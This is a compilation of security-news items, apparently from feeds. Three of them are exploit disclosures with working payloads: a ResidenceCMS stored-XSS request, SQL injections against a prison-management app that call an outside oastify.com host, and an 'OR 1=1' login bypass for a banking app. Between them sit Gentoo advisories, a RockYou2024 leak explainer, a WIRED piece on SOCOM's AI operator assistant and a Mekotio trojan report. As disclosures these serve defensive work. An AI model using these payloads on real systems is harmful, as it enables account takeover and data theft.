ResidenceCMS versions 2.10.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form# Date: 8-7-2024# Category: Web Application# Exploit Author: Jeremia Geraldi Sihombing# Version: 2.10.1# Tested on: Windows# CVE: CVE-2024-39143Description:----------------A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered..Steps to reproduce-------------------------1. Login as a low privilege user with property edit capability.2. Create or Edit one of the user owned property (We can user the default property owned by the user).3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not.Vulnerable parameter name: property[property_description][content]Example Payload: <img src="x" onerror="alert(document.cookie)">4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account.Burp Request-------------------POST /en/user/property/7/edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 1111Origin: http://localhostConnection: keep-aliveReferer: http://localhost/en/user/property/7/editCookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=falseUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=1property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

ResidenceCMS 2.10.1 Cross Site Scripting

Gentoo Linux Security Advisory 202407-20 - A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation. Versions greater than or equal to 5.27.11.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: KDE Plasma Workspaces: Privilege Escalation  
     Date: July 06, 2024  
     Bugs: #933342  
       ID: 202407-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in KDE Plasma Workspaces, which can  
lead to privilege escalation.

Background  
==========

KDE Plasma workspace is a widget based desktop environment designed to  
be fast and efficient.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
kde-plasma/plasma-workspace  < 5.27.11.1   >= 5.27.11.1

Description  
===========

Multiple vulnerabilities have been discovered in KDE Plasma Workspaces.  
Please review the CVE identifiers referenced below for details.

Impact  
======

KSmserver, KDE's XSMP manager, incorrectly allows connections via ICE  
based purely on the host, allowing all local connections. This allows  
another user on the same machine to gain access to the session  
manager.

A well crafted client could use the session restore feature to execute  
arbitrary code as the user on the next boot.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All KDE Plasma Workspaces users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-plasma/plasma-workspace-5.27.11.1"

References  
==========

[ 1 ] CVE-2024-36041  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36041

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-20

PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00

PMS 2024 1.0 SQL Injection

Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #932375  
       ID: 202407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.11.0    >= 115.11.0  
mail-client/thunderbird-bin  < 115.11.0    >= 115.11.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.11.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.11.0"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 4 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 5 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 6 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 7 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-19

Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123    Vuln code:/classes/Login.phpVuln parameter:username    public function login(){    extract($_POST);    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");    if($qry->num_rows > 0){      foreach($qry->fetch_array() as $k => $v){        if(!is_numeric($k) && $k != 'password'){          $this->settings->set_userdata($k,$v);        }      }      $this->settings->set_userdata('login_type',1);    return json_encode(array('status'=>'success'));    }else{    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));    }  }

Simple Online Banking System 1.0 SQL Injection

Gentoo Linux Security Advisory 202407-18 - A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes. Versions greater than or equal to 23.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Stellarium: Arbitrary File Write  
     Date: July 05, 2024  
     Bugs: #905300  
       ID: 202407-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Stellarium, which can lead to  
arbitrary file writes.

Background  
==========

Stellarium is a free open source planetarium for your computer. It shows  
a realistic sky in 3D, just like what you see with the naked eye,  
binoculars or a telescope.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
sci-astronomy/stellarium  < 23.1        >= 23.1

Description  
===========

A vulnerability has been discovered in Stellarium. Please review the CVE  
identifier referenced below for details.

Impact  
======

Attackers can write to files that are typically unintended, such as ones  
with absolute pathnames or .. directory traversal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Stellarium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-astronomy/stellarium-23.1"

References  
==========

[ 1 ] CVE-2023-28371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28371

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-18

A list, known as RockYou2024, of almost 10 billion passwords has been released on a hacking forum. What are the dangers?

On a popular hacking form, a user has leaked a file that contains 9,948,575,739 unique plaintext passwords. The list appears to be a compilation of passwords that were obtained during several old and more recent data breaches.

The list is referred to as RockYou2024 because of its filename, rockyou.txt.

To cybercriminals the list has some value because it contains real-world passwords. This means if an attacker tried this list of passwords to try to break into an account (known as a brute force attack) they’s be more likely to get in than just trying a list of any old letters and words. However, it’s highly unlikely that there are any services or websites that would allow anyone to try such an enormous number of passwords, so it’s really only useful to attackers who have stolen a password database and are trying to crack its passwords offline, on their own computer.

Another possible use for cybercriminals is to combine the list with data from other breaches, such as combinations of usernames and passwords, which could get results if the password has been reused. If the cybercriminals also have a list that contains hashed passwords, they could even try to match the hash values of the passwords.

Having the actual password makes an attack a lot easier than when you’re trying a pass-the-hash attack, where an attacker tries to authenticate to a remote server or service by using the hash of a user’s password. However, this only works on services that are vulnerable to pass-the-hash attacks, instead of requiring the associated plaintext password as is normally the case.

To cut a long story short, if you don’t reuse passwords and never use “simple” passwords, like single words, then this release should not concern you. If you use multi-factor authentication (MFA), and you should everywhere you can, there’s also no reason to worry about this.

Malwarebytes has a free tool for you to find out how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 &#8216;RockYou2024&#8217;: Nearly 10 billion passwords leaked online 

The US military has abandoned its half-century dream of a suit of powered armor in favor of a “hyper enabled operator,” a tactical AI assistant for special operations forces.

The day is slowly turning into night, and the American special operators are growing concerned. They are deployed to a densely populated urban center in a politically volatile region, and local activity has grown increasingly frenetic in recent days, the roads and markets overflowing with more than the normal bustle of city life. Intelligence suggests the threat level in the city is high, but the specifics are vague, and the team needs to maintain a low profile—a firefight could bring known hostile elements down upon them. To assess potential threats, the Americans decide to take a more cautious approach. Eschewing conspicuous tactical gear in favor of blending in with potential crowds, an operator steps out into the neighborhood's main thoroughfare to see what he can see.

With a click of a button, the operator sees … everything. A complex suite of sensors affixed to his head-up display start vacuuming up information from the world around him. Body language, heart rates, facial expressions, and even ambient snatches of conversation in local dialects are rapidly collected and routed through his backpack supercomputers for processing with the help of an onboard artificial intelligence engine. The information is instantly analyzed, streamlined, and regurgitated back into the head-up display. The assessment from the operators’ tactical AI sidekick comes back clear: There are a series of seasonal events coming into town, and most passersby are excited and exuberant, presenting a minimal threat to the team. Crisis averted—for now.

This is one of many potential scenarios repeatedly presented by Defense Department officials in recent years when discussing the future of US special operations forces, those elite troops tasked with facing the world’s most complex threats head-on as the “tip of the spear” of the US military. Both defense officials and science-fiction scribes may have envisioned a future of warfare shaped by brain implants and performing enhancing drugs, or a suit of powered armor straight out of _Starship Troopers_, but according to US Special Operations Command, the next generation of armed conflict will be fought (and, hopefully, won) with a relatively simple concept: the “hyper enabled operator.”

**More Brains, Less Brawn**

First introduced to the public in 2019 in an essay by officials from SOCOM’s Joint Acquisition Task Force (JATF) for Small Wars Journal, the hyper-enabled operator (HEO) concept is the successor program to the Tactical Assault Light Operator Suit (TALOS) effort that, initiated in 2013, sought to outfit US special operations forces with a so-called “Iron Man” suit. Inspired by the 2012 death of a Navy SEAL during a hostage rescue operation in Afghanistan, TALOS was intended to improve operators’ survivability in combat by making them virtually resistant to small-arms fire through additional layers of sophisticated armor, the latest installment of the Pentagon’s decades-long effort to build a powered exoskeleton for infantry troops. While the TALOS effort was declared dead in 2019 due to challenges integrating its disparate systems into one cohesive unit, the lessons learned from the program gave rise to the HEO as a natural successor.

The core objective of the HEO concept is straightforward: to give warfighters “cognitive overmatch” on the battlefield, or “the ability to dominate the situation by making informed decisions faster than the opponent,” as SOCOM officials put it. Rather than bestowing US special operations forces with physical advantages through next-generation body armor and exotic weaponry, the future operator will head into battle with technologies designed to boost their situational awareness and relevant decisionmaking to superior levels compared to the adversary. Former fighter pilot and Air Force colonel John Boyd proposed the “OODA loop” (observe, orient, decide, act) as the core military decisionmaking model of the 21st century; the HEO concept seeks to use technology to “tighten” that loop so far that operators are quite literally making smarter and faster decisions than the enemy.

“The goal of HEO,” as SOCOM officials put it in 2019, “is to get the right information to the right person at the right time.”

To achieve this goal, the HEO concept calls for swapping the powered armor at the heart of the TALOS effort for sophisticated communications equipment and a robust sensor suite built on advanced computing architecture, allowing the operator to vacuum up relevant data and distill it into actionable information through a simple interface like a head-up display—and do so “at the edge,” in places where traditional communications networks may not be available. If TALOS was envisioned as an “Iron Man'' suit, as I previously observed, then HEO is essentially Jarvis, Tony Stark’s built-in AI assistant that’s constantly feeding him information through his helmet’s head-up display.

“\[JATF\] is targeting technologies to deliver cognitive overmatch to SOF operators working at the edge in austere and contested environments in coordination with and working through partners and allies,” SOCOM spokesperson James O. Gregory tells WIRED, invoking a general description of the program from the command’s website. “Such technologies will enable tactical teams of SOF operators to intuitively use information made available by next-generation sensors, networks, computing, and communication systems to rapidly build situation awareness. It will also help make timely, well-informed decisions, and take actions inside an adversary's ability to react.”

**Enter the Gray Zone**

So what does the HEO actually look like today, five years after its introduction into the US military’s tactical lexicon? Given the sensitive (and somewhat notional) nature of the effort, details remain scarce, and SOCOM officials have remained relatively tight-lipped about its progress. But according to SOCOM’s Gregory, the scenario and concept the HEO seeks to address has “evolved” from what officials previously described to reporters at the program’s inception. Indeed, rather than augmenting warfighters deployed to active combat zones, SOCOM officials envision something more like a casually dressed operator vacuuming up information on a busy urban avenue through a Google Glass-like eyepiece and sizing up the situation—in other words, more James Bond than Tony Stark.

“The operational environment for the JATF’s current efforts is in the competition phase of warfare, in permissive or semi-permissive locations,” Gregory says. (A permissive environment is generally defined as an operational environment where US forces have the backing of a host country’s security apparatus, according to the US Army, while a “semi-permissive” environment is potentially hostile and local support is often not reliable.) No longer just another tool for a kinetic assault, the HEO will help elite troops operating in the “gray zone” between peace and conflict.

A SOCOM broad agency announcement—a general request for research and development proposals from the defense industry—published in 2020 and updated as recently as November 2023 details the JATF’s push for advanced technologies designed to boost situational awareness. Those technologies include: intelligence, surveillance, and reconnaissance capabilities “without substantial manning or networking resources” (the aforementioned “at the edge”); sophisticated sensors capable of “iris, facial, anatomical measures, gestures, gait, heartbeat, electromagnetic signals, deoxyribonucleic acid \[DNA\], and microbiome recognition”; low-visibility communications systems; and “data visualizations” that “permit \[operators\] to receive and intuitively understand networked information from communication, computing, and sensor systems,” among others. In short, the HEO envisions systems that enable the constant, real-time collection and distillation of data into actionable intel that could potentially mean the difference between life and death in an uncertain situation.

**Edge Case**

Envisioning a suite of aspirational capabilities is one thing; actually building them is another thing entirely. In terms of developing new products, Gregory says that the HEO effort has remained focused on three major experimental technology areas for the last several years: sensing and edge computing, architecture and analysis, and language translation.

“Sensing and edge computing” generally refers to the collection and processing of data from a variety of sources, but it also refers to the specialized computing power that operators need not only to function “at the edge,” but to actually run the AI-enabled software that will form the foundation of the HEO.

“Emerging technologies and solutions in artificial intelligence/machine learning require specialized ‘compute’ hardware, as traditional CPU-based devices are insufficient,” Gregory says. “We aim to feature a manpack device with a graphics processing unit, neural processing engine, and/or tensor processing unit capabilities. This will provide the necessary platform to leverage advanced technologies like language translation and other solutions at the edge, even when disconnected from the cloud.”

That computing power forms the basis for the “architecture and analysis” element focused on the rapid assessment and presentation of data to operators in the field. Gregory tells WIRED that, to support this element, the command has developed “a flexible \[system\] architecture that fuses data from various sources and media types” into an easily digestible format for operators to assess and act upon.

As for language translation, that’s self-explanatory. SOCOM believes that “prior to any hostilities ever occurring, clear communication can greatly enhance development of our long-term relationships,” Gregory says. “Voice-to-voice translation enables operators to communicate more effectively than relying on often scarce interpreters in the field. Even though many SOF personnel are multilingual, they are frequently deployed to regions with different languages or dialects.”

In line with these experimental technology areas, SOCOM has reportedly concentrated on six immediate lines of product development, per C4ISRNet: the “operator-worn kit” that includes both sensors and onboard computer processing power; application development resources; a unique, mission-agnostic system architecture; the “human-machine interface” that’s generally envisioned as a digital head-up display; a product called “information realization” that likely involves the clear presentation of data; and beyond-line-of-sight (BLoS) communications designed to keep troops in contact with their commanders (and each other) in satellite-denied environments.

According to Gregory, the command has gradually rolled out a handful of fresh capabilities from the HEO effort in recent years. In 2021, SOCOM announced that two products—a BLoS communications system and an unspecified “integrated situational awareness tool”—were transitioning into official programs of record, as Janes reported at the time. Gregory confirmed to WIRED that the BLoS system consists of “a steerable gimble antenna system that enhances the functionality” of the command’s SOF deployable nodes, a family of advanced satellite communications systems. The spokesperson also confirmed that the situational awareness tool, known as SEEKER, is an app that “enables advisers to build advanced situational awareness, thereby allowing them to select actions with an eye toward the broader situation rather than just the immediately apparent problem.” It’s unclear if the latter is related to the “automate the analyst” effort the command kicked off in 2020 to provide operators with an autonomous AI assistant.

Then there’s the “visual environment translation” system that’s designed to convert foreign language inputs into clear English in real time. Known overarchingly as the Versatile Intelligent Translation Assistant (VITA), the system encompasses both a visual environment translation effort and voice-to-voice translation capabilities and is “the most mature” of the JATF’s experimental technology areas, according to SOCOM. VITA is essentially “a voice-to-voice translation engine that functions offline on GPU-enabled devices,” Gregory says, small enough to be carried in the field on a laptop-tethered smartphone or wearable device and “engage in effective conversations where it was previously impossible.” And not only has VITA successfully demonstrated Russian, Chinese Mandarin, and Ukrainian language translation capabilities during testing, but the system has even been deployed to two undisclosed theaters of operations already.

“The visual translation component enhances situational awareness by translating video images, such as street signs, graffiti, and other written texts, in real time,” Gregory says. “Operators can use their phone cameras to scan their surroundings and understand foreign languages instantly.”

VITA provides US special operations forces with “a high-quality translation capability that is not reliant on the cloud or local interpreters, thus significantly reducing risk and logistical costs while increasing operational range and effectiveness for USSOF and our partners,” Gregory says. “The JATF is currently working with industry partners to reduce the size of the hardware and transition it into a SOF Program Executive Office for eventual fielding.” (And that language translation may not be restricted to a mobile device for long: According to SOCOM’s fiscal year 2025 budget request published in March, the command is still plowing ahead with head-mounted sensors and an augmented-reality HUD to present these functions right before operators’ eyes.)

**Field Work**

To US military planners, the HEO concept is promising: According to one Army assessment, the successful adoption of the system could potentially increase operator survivability far beyond that provided by the additional body armor of the TALOS program. But like other potentially revolutionary technology ventures, there’s certainly the possibility that HEO could end up a science fiction dream that collapses under the weight of its own technical complexity. And there’s no guarantee that operators will embrace the new technology seamlessly in the first place: Although VITA has shown operational promise, it’s unclear if other HEO products will prove intuitive enough to actually augment operators in the field rather than burden them with some complicated newfangled system. As Heinlein put it so aptly in _Starship Troopers_: “If you load a mud foot down with a lot of gadgets that he has to watch, somebody a lot more simply equipped—say with a stone ax—will sneak up and bash his head in while he is trying to read a vernier.”

Perhaps, like TALOS, the promise of a tactical AI assistant like Tony Stark’s Jarvis sidekick may prove simply too ambitious for military engineers to realize in a fully formed product. But even if the HEO effort ends up only fielding, say, the VITA language translation tool, it will still represent a major boost in capabilities for US special operators deployed abroad. The day is slowly turning into night, but American commandos own the night and, with the help of the HEO, will do so well into the next conflict.

AI-Powered Super Soldiers Are More Than Just a Pipe Dream

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).
That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.
Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).

That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.

Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials.

First documented by ESET in August 2020, it's part of a tetrade of banking trojans targeting the region Guildma, Javali, and Grandoreiro, the latter of which was dismantled by law enforcement earlier this year.

"Mekotio shares common characteristics for this type of malware, such as being written in Delphi, using fake pop-up windows, containing backdoor functionality and targeting Spanish- and Portuguese-speaking countries," the Slovakian cybersecurity firm said at the time.

The malware operation suffered a blow in July 2021 when Spanish law enforcement agencies arrested 16 individuals belonging to a criminal network in connection with orchestrating social engineering campaigns targeting European users that delivered Grandoreiro and Mekotio.

Attack chains involve the use of tax-themed phishing emails that aim to trick recipients into opening malicious attachments or clicking on bogus links that lead to the deployment of an MSI installer file, which, in turn, makes use of an AutoHotKey (AHK) script to launch the malware.

It's worth noting that the infection process marks a slight deviation from the one previously detailed by Check Point in November 2021, which made use of an obfuscated batch script that runs a PowerShell script to download a second-stage ZIP file containing the AHK script.

Once installed, Mekotio harvests system information and establishes contact with a command-and-control (C2) server to receive further instructions.

It's main objective is to siphon banking credentials by displaying fake pop-ups that impersonate legitimate banking sites. It can also capture screenshots, log keystrokes, steal clipboard data, and establish persistence on the host using scheduled tasks.

The stolen information can then be used by the threat actors to gain unauthorized access to users' bank accounts and perform fraudulent transactions.

"The Mekotio banking trojan is a persistent and evolving threat to financial systems, especially in Latin American countries," Trend Micro said. "It uses phishing emails to infiltrate systems, with the goal of stealing sensitive information while also maintaining a strong foothold on compromised machines."

The development comes as Mexican cybersecurity firm Scitum disclosed details of a new Latin American banking trojan codenamed Red Mongoose Daemon that, similar to Mekotio, utilizes MSI droppers distributed via phishing emails masquerading as invoices and tax notes.

"The main objective of Red Mongoose Daemon is to steal victims' banking information by spoofing PIX transactions through overlapping windows," the company said. "This trojan is aimed at Brazilian end users and employees of organizations with banking information."

"Red Mongoose Daemon has capabilities for manipulating and creating windows, executing commands, controlling the computer remotely, manipulating web browsers, hijacking clipboards, and impersonating Bitcoin wallets by replacing copied wallets with the ones used by cybercriminals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Warn of Mekotio Banking Trojan Targeting Latin American Countries

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-37389

**Apache NiFi vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 8, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

**Package**

maven org.apache.nifi:nifi-web-ui (Maven)

**Affected versions**

\>= 1.10.0, < 1.27.0

\>= 2.0.0-M1, < 2.0.0-M4

**Patched versions**

1.27.0

2.0.0-M4

**Description**

Published to the GitHub Advisory Database

Jul 8, 2024

Tag

#web